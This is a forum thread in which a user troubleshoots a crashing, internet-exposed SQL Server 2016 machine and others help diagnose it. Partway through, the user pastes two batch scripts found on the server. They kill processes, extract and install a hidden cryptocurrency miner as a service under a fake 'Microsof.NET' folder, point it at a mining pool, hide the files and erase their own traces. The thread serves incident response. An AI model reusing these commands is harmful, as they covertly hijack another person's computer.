July 4, 2017 at 8:53 pm
Hello Everyone,
I have a Windows Server 2016 server which is running SQL Server 2016.
My application interacts with the server and exchanges stock market data.
Things have been going well for last 6 months. However since last week to 10 days the sql server suddenly stops running. When I see event log it shows that sql server has crashed. I have to start the server again and then it resumes.
I dunno why this is happening. However i did notice an application running called secury.exe which consumes a lot of memory. Have a look at screenshot.My server has over 15 GB of free disk space and 2 gb ram.However the applications which exchanges data from server is few at the moment (<30).
I did run a windows defender quick scan but it didn't turn up anything.
Please advice as to what can I do.
Regards,
GR
July 5, 2017 at 12:10 am
Can you post the errors from the log please?
😎
July 5, 2017 at 1:54 am
Eirikur Eiriksson - Wednesday, July 5, 2017 12:10 AMCan you post the errors from the log please?
😎
How do I do that?
To me it appears to be some sort of malware. Checkout the name of folder in the screenshot in first post. The spelling of microsoft is incorrect.
July 5, 2017 at 1:57 am
greatchap_99 - Wednesday, July 5, 2017 1:54 AMHow do I do that?
Open the SQL error log, copy the messages from around the time of the crash and post them here. Same with the windows event log.
Gail Shaw
Microsoft Certified Master: SQL Server, MVP, M.Sc (Comp Sci)
SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability
July 5, 2017 at 3:34 am
Both log files attached. See pdf files.
Thank you.
July 5, 2017 at 3:52 am
Not related to the crash, but...
Disable the sa account and fix that server's firewalls so that it's not exposed to the entire internet. You've got login attempts on sa and other administrator-type accounts from Kenya, China and Thailand at the minimum. Since the server is in India, I doubt they're legit logins
Database servers should never be exposed to the internet, they're prime targets because of the value of the data.
p.s. remove those attachments. I asked for the messages around the time of the crash, not the full details of your server, the IP addresses and ports that it's listening on, database names, services that Windows is running etc.
Actually, thinking about it, if the security of the rest of the server is as badly screwed up as the firewall, better to trash the server and reinstall it from scratch, and get the configuration right this time.
Gail Shaw
Microsoft Certified Master: SQL Server, MVP, M.Sc (Comp Sci)
SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability
July 5, 2017 at 4:27 am
Looks to me like someone is trying to use the old "DTS Password" vulnerability or later variants thereof
😎
Recommend that you remove those attachments immediately!
July 5, 2017 at 4:35 am
Thank you for your feedback. [attachments deleted]
I am not very well versed with configuration of sql server or so. Thus may not be able to fix the whole issue.
Meanwhile I would like to do 2 things:
1) Disable sa account
2) fix a malware ( I think)
There are 2 dat files in programdata folder: one file reads
taskkill /f /t /im winlog.exe
taskkill /f /t /im kingsoft.exe
taskkill /f /t /im secury.exe
C:\ProgramData\xn.exe e -o+ C:\ProgramData\*.rar C:\ProgramData\Microsof.NET\
del /F /S /Q C:\ProgramData\*.rar C:\ProgramData\xn.exe
c:\ProgramData\Microsof.NET\kingsoft.exe
c:\ProgramData\Microsof.NET\winlogon.exe install Workstationxzc secury.exe -a lyra2z -o stratum+tcp://
c:\ProgramData\Microsof.NET\winlogon.exe start Workstationxzc
@attrib +s +h +r c:\ProgramData\Microsof.NET\winlogon.exe
@attrib +s +h +r c:\ProgramData\Microsof.NET\secury.exe
@attrib +s +h +r c:\ProgramData\Microsof.NET\kingsoft.exe
C:\ProgramData\Microsof.NET\secury.exe -a lyra2z -o stratum+tcp://
del c:\ProgramData\b.bat
del c:\ProgramData\p.bat
del /F /S /Q C:\ProgramData\b.exe C:\ProgramData\ba.exe
del %0
The other reads
c:\ProgramData\Microsof.NET\secury.exe -a lyra2z -o stratum+tcp://us-east.lyra2z-hub.miningpoolhub.com:20581 -u Allin.any -p x
As I mentioned I ended an application called secury.exe which was running in background and taking lot of cpu usage. I think the above is responsible for sql server to crash out.
What do you say? Should I delete the bat files and folder where this exe resides. (Screenshot attached in the first image shows files/info)
July 5, 2017 at 4:49 am
Fix your firewall settings!
[/quote]
[/quote]
And saying you may not get it right is like saying you don't care if the entire database shows up on pastebin, or for sale by hackers. If you don't know network security, find someone who does.
Gail Shaw
Microsoft Certified Master: SQL Server, MVP, M.Sc (Comp Sci)
SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability
July 5, 2017 at 8:41 pm
GilaMonster - Wednesday, July 5, 2017 4:49 AMFix your firewall settings!GilaMonster - Wednesday, July 5, 2017 3:52 AMActually, thinking about it, if the security of the rest of the server is as badly screwed up as the firewall, better to trash the server and reinstall it from scratch, and get the configuration right this time.
[/quote]
And saying you may not get it right is like saying you don't care if the entire database shows up on pastebin, or for sale by hackers. If you don't know network security, find someone who does.
[/quote]
I will try to configure this server itself and fix the firewall. However regarding my earlier post do you suspect malware.
July 6, 2017 at 1:39 am
greatchap_99 - Wednesday, July 5, 2017 8:41 PMI will try to configure this server itself and fix the firewall. However regarding my earlier post do you suspect malware.
It looks suspicious, and the site in the URL posted is a cryptocurrency site, so it might be busy mining bitcoins on your server.
If it malware, and it's competently written, deleting the folder won't get rid of it. That's kinda why I suggested trashing the server, reinstalling it from scratch correctly
Gail Shaw
Microsoft Certified Master: SQL Server, MVP, M.Sc (Comp Sci)
SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability
July 6, 2017 at 6:00 am
I fixed the firewall and deleted the malware. The server is OK now. And no unwanted incoming connections should come as the settings have been tweaked. In DB also I disabled accept remote connections.
I appreciate your help guys. 🙂
July 6, 2017 at 8:24 am
greatchap_99 - Thursday, July 6, 2017 6:00 AMI fixed the firewall and deleted the malware. The server is OK now. And no unwanted incoming connections should come as the settings have been tweaked. In DB also I disabled accept remote connections.I appreciate your help guys. 🙂
I would download a second antivirus/anti-malware to test against your system. Clamwin portable is a fairly lightweight and free antivirus that you could run and it shouldn't interfere with the existing one. And I'd run malwarebytes anti-malware (free version) to make sure you got everything.
I would be concerned about these lines in the scripts you posted:
del c:\ProgramData\b.bat
del c:\ProgramData\p.bat
del /F /S /Q C:\ProgramData\b.exe C:\ProgramData\ba.exe
Those to me look like it is cleaning up the installation files but I wouldn't be surprised if there is more on your system that those installed. Best case - those files were used to get the other files and infect your system initially and removing the folder cleaned it up. Worst case - you have ransomware and once it finishes encrypting your disk, everything will be busted.
Do you have any other odd looking files in C:\programdata?
The above is all just my opinion on what you should do.
As with all advice you find on a random internet forum - you shouldn't blindly follow it. Always test on a test server to see if there is negative side effects before making changes to live!
I recommend you NEVER run "random code" you found online on any system you care about UNLESS you understand and can verify the code OR you don't care if the code trashes your system.
July 7, 2017 at 5:56 am
bmg002 - Thursday, July 6, 2017 8:24 AMgreatchap_99 - Thursday, July 6, 2017 6:00 AMI fixed the firewall and deleted the malware. The server is OK now. And no unwanted incoming connections should come as the settings have been tweaked. In DB also I disabled accept remote connections.I appreciate your help guys. 🙂
I would download a second antivirus/anti-malware to test against your system. Clamwin portable is a fairly lightweight and free antivirus that you could run and it shouldn't interfere with the existing one. And I'd run malwarebytes anti-malware (free version) to make sure you got everything.
I would be concerned about these lines in the scripts you posted:
del c:\ProgramData\b.bat
del c:\ProgramData\p.bat
del /F /S /Q C:\ProgramData\b.exe C:\ProgramData\ba.exeThose to me look like it is cleaning up the installation files but I wouldn't be surprised if there is more on your system that those installed. Best case - those files were used to get the other files and infect your system initially and removing the folder cleaned it up. Worst case - you have ransomware and once it finishes encrypting your disk, everything will be busted.
Do you have any other odd looking files in C:\programdata?
I installed Malwarebytes and ran a scan. The scan did not detect any malware. The bat files and concerned folder has already been deleted. I inspected the server myself and am not able to find any traces of anything suspicious anymore.
July 7, 2017 at 7:04 am
I wonder if it was malware, or if someone intentionally installed it on the server to make some profit on the side from the cryptocurrency mining.
Gail Shaw
Microsoft Certified Master: SQL Server, MVP, M.Sc (Comp Sci)
SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability
Viewing 15 posts - 1 through 15 (of 17 total)
You must be logged in to reply to this topic. Login to reply